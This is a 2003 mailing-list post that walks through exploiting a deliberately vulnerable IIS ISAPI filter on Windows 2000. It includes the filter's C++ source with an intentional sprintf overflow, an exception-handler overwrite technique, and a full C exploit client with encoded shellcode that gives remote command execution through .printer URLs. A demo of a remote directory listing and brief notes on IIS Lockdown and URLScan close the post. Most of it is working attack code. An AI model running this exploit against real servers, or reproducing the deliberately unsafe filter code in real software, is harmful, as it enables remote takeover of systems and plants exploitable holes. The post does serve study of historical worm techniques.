Vulnerability Development mailing list archives
An exercise to exploit IIS ISAPI filter
From: <master_moda () yahoo com>
Date: 15 Jan 2003 04:39:14 -0000
An exercise to exploit Internet Information Server on W2000
--This paper intended for educational purpose only.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Long time back when Codered and Nimda spread across the internet, my
computers were hardhit by them. After lots of effort of cleaning the
virus, I began curious how they manage to reproduce around the Internet
and pass into corperate firewall. Thus I disassembled codered (following
the description from eeye) and another well known for-fun virus named jill,
......
And finally as an exercise, I developed a vulnerable ISAPI filter (see
below) and sucessfully exploited it. The filter is used by IIS on Window
2000 server. Here is the steps I like to share with other system
administrators like me who want to know how the virus works:
1.
First comes the vulerable code:
<========================Logger.cpp===========================>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <httpfilt.h>
#include <EXCPT.H>
#include <WTYPES.H>
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
return TRUE;
}
BOOL WINAPI __stdcall
GetFilterVersion(HTTP_FILTER_VERSION * pVer)
{
//set the flags and request the notications that we need for this
to work
pVer->dwFlags = (SF_NOTIFY_SECURE_PORT |
SF_NOTIFY_NONSECURE_PORT |
SF_NOTIFY_ORDER_LOW |
//SF_NOTIFY_SEND_RESPONSE |
//SF_NOTIFY_END_OF_NET_SESSION |
SF_NOTIFY_LOG
);
pVer->dwFilterVersion = HTTP_FILTER_REVISION;
strcpy( pVer->lpszFilterDesc, "Server Type Changer");
return TRUE;
}
DWORD WINAPI __stdcall
HttpFilterProc(HTTP_FILTER_CONTEXT * pfc, DWORD notificationType,
VOID * pvNotification)
{
PHTTP_FILTER_LOG pLogData;
OutputDebugString("Entered HttpFilterProc\n");
switch (notificationType)
{
case SF_NOTIFY_LOG:
{
OutputDebugString("HttpFilterProc:Logging\n");
TCHAR sz[256];
pLogData = (PHTTP_FILTER_LOG)pvNotification;
sprintf(sz, "Client Machine: %s , Username: %s,
Server\
Machine: %s, Target Path: %s\n", \
pLogData->pszClientHostName,pLogData-
pszClientUserName,\
pLogData->pszServerName, pLogData-
pszTarget );
}
break;
default:
OutputDebugString
("HttpFilterProc:Default\n");
break;
}
return SF_STATUS_REQ_NEXT_NOTIFICATION;
}
<=============================================================>
The function of this filter is merely to log the HTTP request from client.
As you can see, the function sprintf has a buffer overflow bug and this is
the weak point to insert our exploitation code.
2.
compile Logger.cpp into Logger.dll and configure your IIS to import this
dll----You can do this by rightclicking the victim web server from IIS
Service Manager,choose properties, then ISAPI Filter and from here you can
define the Logger.dll as ISAPI filter.
3.
Now comes the exploit description:
When a malicious client send the exploit code to the vulerable IIS,
exploit code will reach the IIS memory space because ISAPI filter was
loaded into the same memory space as its host--IIS.
As the exploit code overflow the buffer, the return address of normal
function call got messed up inside IIS filter. And not only that, We will
let the exploit code continue overflowing the memory as far as the
excepion handler----the handler is replaced by an address(0x77ed5c99)
inside kernel.dll, This address contain instruction "call ebx" in my W2000
configuration.
An Access violation exception happen when IIS filter handling the
malicious HTTP request and as a result, system will resort the exception
handler to clean the mess. But remember that the exception handler itself
got overwritten also, it is now point to "call ebx", so the IIS
instruction flow into whatever location the register ebx point to.
You may figure out that register ebx contain an address not far away from
our exploit code when exception is raised. Thus when system invoke
exception handler to clean the mess, the instruction flow divert into our
exploit code.
The exploit code will then do the following, in a roughly order:
-- spawn a cmd shell with read/write pipe handler
-- modify another dll----msw3prt.dll inside IIS memory in such way
that any invocation to this dll got divert into our exploit code. Also
note that the invocation URL to msw3prt will has exploit command embedded
inside, for example:
http://victim/null.printer?net[user.
Using "[" instead of " " is to avoid " " being interpreted as %20.
-- Exploit code accept the URL and read the exploit command. After
replace "[" with " ", it then send this to the cmd shell through the shell
pipe.
-- Read the execution result from cmd shell and pass back to HTTP
client through writeClient function available from Extension Control
block. The Extension Control Block is a block of infomation for ISAPI.
5.
Here is the exploit code from linux
========================moda.c============================================
#define SIZE 4106
#define ADJUST 1250
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>
int main(int argc, char *argv[]){
unsigned char httpheader1[20]= // GET /HERO.htm"
"\x47\x45\x54\x20"
"\x2f\x48\x45\x52"
"\x4f\x2e\x68\x74"
"\x6d\x00";
unsigned char httpheader2[256]=
"\xeb\x06\x90\x90"
"\x99\x5c\xed\x77"
"\x81\xc3\xde\xfc"
"\xff\xff\xff\xd3"
"\x20\x20\x48\x54"
"\x54\x50\x2f\x31"
"\x2e\x30\x0D\x0A"
"\x43\x6F\x6E\x74"
"\x65\x6E\x74\x2D"
"\x74\x79\x70\x65"
"\x3a\x20\x74\x65"
"\x78\x74\x2f\x78"
"\x6d\x6c\x20\x41"
"\x63\x63\x65\x70"
"\x74\x3a\x20\x2a"
"\x2f\x2a\x0a\x43"
"\x6f\x6e\x74\x65"
"\x6e\x74\x2d\x6c"
"\x65\x6e\x67\x74"
"\x68\x3a\x20\x32"
"\x37\x30\x34\x20"
"\x0d\x0a\x0d\x0a"
"\x00";
char payload[]=
"\x83\xEB\xF1\x33\xC9\x66\xB9\x13\x03\x80\x33\x96\x43\xE2\xFA"
/* Payload encoded with x96*/
"\x7f"
"\x13\x97\x96\x96\xcc\x2e\x96\x96\x67\xe1\x17\xae\xdb\xcc\x06\x96"
"\xe2\x95\xde\x7d\x63\x1d\x4e\x1d\xe5\xaa\x95\x65\x1d\xe0\xee\x95"
"\x65\x1d\xe8\xb6\x95\x6d\x1d\xd8\x82\xa5\x7b\xc0\xc1\xc7\x1d\xa9"
"\x95\x6d\x1d\x64\x2f\x98\x96\x96\x96\x65\x30\xe2\x9e\xcf\xc9\x15"
"\x51\x92\xd3\x74\x71\xcf\xc9\xc8\x1d\x5b\x1d\xd0\xb2\x95\x55\x47"
"\x77\x95\x57\xa5\x5f\xf0\x1d\x9e\x1d\xd0\x8a\x95\x55\x57\x77\x94"
"\x95\x57\x1d\x96\x95\x55\x1d\x64\x1d\x68\x1d\x46\x2f\x9a\x96\x96"
"\x96\x7e\x96\x97\x96\x96\xa5\x56\x3a\x13\x56\xe3\x6f\xc4\xc0\x69"
"\xc1\x46\xcc\x1d\x4e\x2f\x97\x96\x96\x96\x7e\x71\x96\x96\x96\xfe"
"\x96\x93\x96\x96\xfc\xd6\x69\xc1\x76\x1f\xd1\x9e\x51\xd1\x8a\x9a"
"\x96\x96\x96\x51\xd1\xb6\x96\x96\x96\x96\x51\xd1\xb2\x97\x96\x96"
"\x96\xfc\x96\x1b\xd1\x8a\xc6\x1b\xd1\x9a\xc6\x1b\xd1\x86\xc6\x69"
"\xc1\x46\xfc\x96\x1b\xd1\x8a\xc6\x1b\xd1\x82\xc6\x1b\xd1\x8e\xc6"
"\x69\xc1\x46\x1b\xd1\xbe\xc6\x69\xc1\x42\x1d\xd1\x9a\x1f\xd1\xf2"
"\x1f\xd1\xfe\x1d\xd1\x8e\x1f\xd1\xf6\x17\xd9\xc2\x97\x97\x96\x96"
"\xf0\x51\xd1\xce\x96\x96\x1b\xd1\xfa\xc6\x1b\xd1\xbe\xc6\xa5\x56"
"\xc6\xc6\xc6\xfc\x97\xc6\xc6\x1d\x79\x17\x53\x3e\x96\x96\x96\xc3"
"\xc6\x69\xc1\x4e\x69\xe1\x9a\x69\xc1\x6e\x69\xe1\x8e\x69\xc1\x6e"
"\x1b\xd1\x92\xc6\xfc\x92\xfe\x96\x97\x96\x96\x1d\xc1\x6a\xc4\x69"
"\xc1\x7a\xc0\xc5\x1d\x49\x1b\x21\x26\x96\x96\x96\x15\x50\x9f\x1b"
"\x11\x56\x96\x96\x96\x1f\x90\x15\x50\x61\x1d\xed\x6a\x2f\x99\x96"
"\x96\x96\x65\x32\x1d\x6d\xcd\xc8\x1b\xd1\x92\xc6\x1d\xd1\x92\xc6"
"\xfe\x96\x97\x96\x96\x1d\xc1\x6a\xc4\x69\xc1\x7a\xfe\x96\x4b\xfb"
"\x96\x69\xc1\x66\x7d\x60\xa5\x56\x3a\x13\x56\xe3\x6f\xc7\xc4\xc0"
"\xc5\x69\x44\xcc\xcf\x3d\x74\x78\x55\x7e\xe0\x68\x69\x69\xd1\xf3"
"\xe2\xc6\xe4\xf9\xf5\xd7\xf2\xf2\xe4\xf3\xe5\xe5\x96\xda\xf9\xf7"
"\xf2\xda\xff\xf4\xe4\xf7\xe4\xef\xd7\x96\xd5\xe4\xf3\xf7\xe2\xf3"
"\xc6\xff\xe6\xf3\x96\xd1\xf3\xe2\xc5\xe2\xf7\xe4\xe2\xe3\xe6\xdf"
"\xf8\xf0\xf9\xd7\x96\xd5\xe4\xf3\xf7\xe2\xf3\xc6\xe4\xf9\xf5\xf3"
"\xe5\xe5\xd7\x96\xc6\xf3\xf3\xfd\xd8\xf7\xfb\xf3\xf2\xc6\xff\xe6"
"\xf3\x96\xd1\xfa\xf9\xf4\xf7\xfa\xd7\xfa\xfa\xf9\xf5\x96\xc1\xe4"
"\xff\xe2\xf3\xd0\xff\xfa\xf3\x96\xc4\xf3\xf7\xf2\xd0\xff\xfa\xf3"
"\x96\xc0\xff\xe4\xe2\xe3\xf7\xfa\xc6\xe4\xf9\xe2\xf3\xf5\xe2\x96"
"\xc5\xfa\xf3\xf3\xe6\x96\xd3\xee\xff\xe2\xc6\xe4\xf9\xf5\xf3\xe5"
"\xe5\x96\xd5\xfa\xf9\xe5\xf3\xde\xf7\xf8\xf2\xfa\xf3\x96\xdb\xc5"
"\xc1\xa5\xc6\xc4\xc2\x96\xde\xe2\xe2\xe6\xd3\xee\xe2\xf3\xf8\xe5"
"\xff\xf9\xf8\xc6\xe4\xf9\xf5\x96\x06\x06\x06\x06\x06\x06\x06\x06"
"\x06\x06\x06\x06\x06\x06\x06\x06\x06\x06\x06\x06\x06\x06\x06\x06"
"\x06\x06\x06\x06\x06\x06\x06\x06\x96\x96\xf5\xfb\xf2\xb8\xf3\xee"
"\xf3\x96\x06\x06\x06\x06\x06\x06\x06\x06\x2e\x96\x96\x67\xe1\x69"
"\x46\x96\x06\x06\x06\x15\x52\x92\xf6\x7e\x96\x96\x96\x96\xc9\x17"
"\x79\x5a\x96\x96\x96\x1d\xcb\x86\xfc\x96\xc1\xa5\x56\xa5\x44\x1d"
"\xe5\xf2\x3a\xd4\x15\x6e\xcd\xe3\x92\x50\xd0\x69\xb6\x13\x56\xe3"
"\x67\x50\xd0\x69\x9b\x50\x90\x9c\x50\xd0\x97\x96\xd4\xc4\x69\xe5"
"\xf2\x69\xe1\x82\x69\xc1\x72\xfc\xf2\x69\xc1\x66\xa5\x5f\xc7\xc1"
"\xc7\xc7\xc7\x69\xe1\x86\x69\xc1\x4a\x13\x56\xe2\xa6\x16\xa9\x96"
"\xe2\xb1\xfc\x96\xc1\xfe\x96\x93\x96\x96\x69\xe1\x9e\x69\xe1\x86"
"\x69\xc1\x7e\x13\x56\xe2\x80\xfc\x96\xc1\x69\xe1\x9e\x1d\xdd\x9e"
"\xc7\x69\x05\x12\x96\x96\x96\x7d\x28\xf7\x54\x92\x96\xfc\x97\x69"
"\xc1\x62";
unsigned char *ptr;
unsigned char sploit[SIZE];
int s;
unsigned short int a_port;
unsigned long a_host;
struct hostent *ht;
struct sockaddr_in sin;
if (argc != 3){
printf("usage: %s <victimHost> <victimPort> \n",argv[0]);
exit(1);
}
if ((ht = gethostbyname(argv[1])) == 0){
herror(argv[1]);
exit(1);
}
sin.sin_port = htons(atoi(argv[2]));
sin.sin_family = AF_INET;
sin.sin_addr = *((struct in_addr *)ht->h_addr);
ptr=sploit;
memcpy(ptr, httpheader1, strlen(httpheader1) );
ptr+=strlen(httpheader1);
memset(ptr,'\x90', SIZE - strlen(httpheader1) - strlen(httpheader2) -strlen
(payload)
-ADJUST);
ptr+=SIZE - strlen(httpheader1) -strlen(httpheader2) - strlen(payload) -
ADJUST;
memcpy(ptr, payload, strlen(payload) );
ptr+= strlen(payload);
memcpy(ptr, httpheader2, strlen(httpheader2));
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
perror("socket");
exit(1);
}
printf("\nconnecting... \n");
if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
perror("connect");
exit(1);
}
write(s, sploit, SIZE-ADJUST);
sleep (5);
close (s);
printf("sent... \n");
exit(0);
}
==========================================================================
6.
Now here is the demo of how the exploit code work through a web browser
such as MS internet explorer:
From explorer address send the URL
http://victim/null.printer?dir after a while, the browser got response: D:\WINNT\system32>dir Volume in drive D has no label. Volume Serial Number is 7086-EBAD Directory of D:\WINNT\system32 07/11/2002 10:46p <DIR> . 07/11/2002 10:46p <DIR> .. 10/29/2001 03:29p 647 $winnt$.inf 10/29/2001 03:35p 4,108 $WINNT$.PNF 06/26/2000 09:15a 2,151 12520437.cpx 06/26/2000 09:15a 2,233 12520850.cpx 12/07/1999 05:00a 32,016 aaaamon.dll 12/07/1999 05:00a 67,344 access.cpl 12/07/1999 05:00a 13,753 accserv.mib 12/07/1999 05:00a 59,904 acctres.dll 12/07/1999 05:00a 150,800 accwiz.exe 12/07/1999 05:00a 61,952 acelpdec.ax 12/07/1999 05:00a 131,856 acledit.dll 12/07/1999 05:00a 78,096 aclui.dll 12/07/1999 05:00a 33,298 acs.mib 12/07/1999 05:00a 4,368 acsetupc.dll 12/07/1999 05:00a 17,168 acsetups.exe 12/07/1999 05:00a 11,536 acsmib.dll ......... 12/07/1999 05:00a 73,776 wshom.ocx 12/07/1999 05:00a 17,680 wshtcpip.dll 12/07/1999 05:00a 39,696 wsnmp32.dll 12/07/1999 05:00a 21,776 wsock32.dll 12/07/1999 05:00a 14,608 wtsapi32.dll 12/07/1999 05:00a 25,872 wupdinfo.dll 12/07/1999 05:00a 47,376 wupdmgr.exe 12/07/1999 05:00a 92,432 xactsrv.dll 12/07/1999 05:00a 28,432 xcopy.exe 12/07/1999 05:00a 110,664 xenroll.dll 12/07/1999 05:00a 641,808 xiffr3_0.dll 12/07/1999 05:00a 17,680 xolehlp.dll 2017 File(s) 291,632,897 bytes 33 Dir(s) 531,480,576 bytes free D:\WINNT\system32> P.S. The New IIS6.0, part of Microsoft .NET server has hugh improvement against virus/worm, at least that's the feeling I got when reading MSDN papers: 1. The IIS LockDown has removed lots of unused dynamic script type, including .printer which the above exploit code has abuse. It also disable unnecessary service. 2. The IIS URLScan is a ISAPI filter that try to catch malicious URL: A extreme long URL like the one in our exploit may have malicious code embeded inside, so web master can preset the maximum size of URL allowed. A URL with non-ascii byte inside is also dangerous, URLScan is also able to catch that.
Current thread:
- An exercise to exploit IIS ISAPI filter master_moda (Jan 17)
